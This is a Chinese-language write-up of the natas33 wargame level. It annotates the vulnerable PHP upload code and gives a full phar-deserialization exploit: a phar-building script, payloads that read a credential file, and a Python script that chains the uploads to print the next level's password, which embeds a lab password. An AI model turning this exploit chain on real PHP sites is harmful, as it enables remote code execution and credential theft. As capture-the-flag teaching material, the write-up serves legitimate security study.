我们打开关卡 lv33，登录后查看信息
是一个上传文件的页面
应该是做了很多过滤
查看源码
// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
    // Three private properties. $filename and $signature are the two values
    // __destruct() below relies on; both travel with any serialized copy of
    // the object, so whoever controls a serialized Executor controls them.
    private $filename="";
    private $signature='adeafbadbabec0dedabada55ba55d00d';
    private $init=False; // not referenced by any code on this page

    // Called when the object is created (the `new Executor()` at the bottom).
    // Stores the uploaded file under a caller-chosen name.
    function __construct(){
        // Taken verbatim from the POST body: no basename(), no allowlist,
        // and no rejection of "../" or stream-wrapper prefixes ("phar://").
        $this->filename=$_POST["filename"];
        // Only the size is limited (4096 bytes); type and content are not inspected.
        if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) {
            echo "File is too big<br>";
        }
        else {
            // Destination path is built by concatenating the user-supplied
            // name, so the uploader chooses the final file name.
            if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
                echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                echo "Firmware upgrad initialised.<br>"; // sic: runtime string kept as-is
            }
            else{
                echo "There was an error uploading the file, please try again!<br>";
            }
        }
    }

    // Called when the object is destroyed: at script shutdown for the instance
    // created below, and equally for any Executor that PHP rebuilds by
    // unserializing data (this is the deserialization issue the writeup exploits).
    function __destruct(){
        // upgrade firmware at the end of this script
        // "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)."
        // NOTE(review): this path is "/natas33/uploads/" (with an "s") while
        // __construct() writes to "/natas33/upload/"; as written they do not match.
        if(getcwd() === "/") chdir("/natas33/uploads/");
        // md5_file() opens $this->filename through PHP's stream layer, so a
        // wrapper-prefixed name is honoured; opening a phar:// path also makes
        // PHP unserialize the archive's metadata. The comparison is a loose `==`
        // rather than `===`/hash_equals(), and $signature comes from the same
        // untrusted object as $filename. Mitigation: validate the name before
        // any file operation and never derive an "execute" decision from a hash
        // stored alongside the data it is supposed to verify.
        if(md5_file($this->filename) == $this->signature){
            echo "Congratulations! Running firmware update: $this->filename <br>";
            // Runs the named file with the PHP CLI: code execution for anyone
            // who can make the check above pass.
            passthru("php " . $this->filename);
        }
        else{
            echo "Failur! MD5sum mismatch!<br>"; // sic: runtime string kept as-is
        }
    }
}
session_start(); // session is started but not read anywhere on this page
// An Executor (upload in __construct, hash check + passthru in __destruct at
// shutdown) is only created when both the "filename" field and the
// "uploadedfile" upload are present in the request.
if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
    new Executor();
}
查询大神的思路
思路是反序列化漏洞
按照思路
test.php
<?php /* File uploaded in step 1 of the writeup; it only does anything if the target's passthru("php ...") later runs it. */ echo shell_exec('cat /etc/natas_webpass/natas34'); ?>
打开bp拦截
1、我们先上传查看密码的php文件
上传test.php
点击上传
修改名字
主要是让文件名与后面上传的 phar 文件相对应
提示md5的值不对
2、我们再上传phar文件
拦截
修改名字
修改名字方便执行
成功上传
我们执行
重新上传一遍
只是修改下名字
出现报错
名字错了
我们重新来一遍
使用python脚本
natas33solution.py
import subprocess
import re
import requests
from requests.auth import HTTPBasicAuth
def get_pass() -> None:
    """Run the three-request natas33 solution described in the writeup and print the match.

    Expects ``exploit.phar`` (built by ``gen_phar_payload.php`` further down the
    page) and ``payload.php`` in the current working directory. Performs HTTP
    requests only; returns nothing.
    """
    # Credentials of the level being solved, embedded in the script.
    # NOTE(review): keep secrets like this out of committed code (env var / config file).
    auth = HTTPBasicAuth('natas33', 'APwWDD3fRAf6226sgBOBaSptGwvXwQhG')
    # NOTE(review): these handles are opened and never closed; a `with` block
    # (or closing them once the posts are done) would avoid leaking descriptors.
    phar_payload = {'uploadedfile': open('exploit.phar', 'rb')}
    php_payload = {'uploadedfile': open('payload.php', 'rb')}
    final_payload = {'uploadedfile': open('exploit.phar', 'rb')}
    # Filename assignments for each payload
    phar_data = {'filename':'taldgan.phar'}
    php_data = {'filename':'taldgan.php'}
    # The last name is a stream-wrapper path rather than a plain file name: the
    # target's md5_file() opens it via the phar:// wrapper (see the PHP source above).
    final_data = {'filename':'phar://taldgan.phar'}
    # Need to make 3 requests: 1 to upload the php payload, 1 to upload the phar,
    # and 1 to read the phar with phar://taldgan.phar as the filename
    requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=phar_payload, data=phar_data)
    requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=php_payload, data=php_data)
    r = requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=final_payload, data=final_data)
    # Assumes the password is a 32-character alphanumeric token -- TODO confirm.
    passreg = '[a-zA-Z0-9]{32}'
    # NOTE(review): `[0]` raises IndexError when nothing matched (e.g. the server
    # answered "MD5sum mismatch"); check the match list before indexing.
    print(re.findall(passreg, r.text)[0])
if __name__ == "__main__":
    # Script entry point: only runs when executed directly, not on import.
    get_pass()
附属的文件为
gen_phar_payload.php
<?php
// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
    // Same class name and private property names as the target's Executor:
    // when the target unserializes this object it is rebuilt as that class
    // and its __destruct() runs with these values. Only the two properties
    // the destructor reads are set; the target's $init is left out.
    //
    // Name under which the solution script uploads payload.php.
    private $filename='taldgan.php';
    // Presumably md5 of payload.php, computed with the md5payload helper below -- confirm.
    private $signature='6ae14bb82be23c2cbd46a47366cf08c0';
}
// Build the archive on disk. Phar metadata is stored serialized, so the
// Executor object below is written into exploit.phar and gets unserialized
// by whichever process later opens the archive through the phar:// wrapper.
$phar = new Phar('exploit.phar');
$phar->startBuffering();
// One dummy entry; its content is not referenced anywhere on this page
// (presumably just so the archive is non-empty -- confirm).
$phar->addFromString("payload.php", "payload");
// NOTE(review): "? >" with a space looks like a transcription of "?>" -- confirm against the original file.
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$object = new Executor();
$phar->setMetadata($object); // serialized into the archive's metadata section
$phar->stopBuffering();
?>
md5payload
<?php
// Print the MD5 of the file named by the first CLI argument, followed by a newline.
echo md5_file($argv[1]), "\n";
?>
payload.php
<?php /* Payload referenced by the solution script (uploaded as taldgan.php); it only runs if the target's passthru("php ...") executes it. */ passthru('cat /etc/natas_webpass/natas34'); ?>
我们使用vscode跑
等待结果
由于natas34打不开,无法验证密码。
等网络好一点,再试一试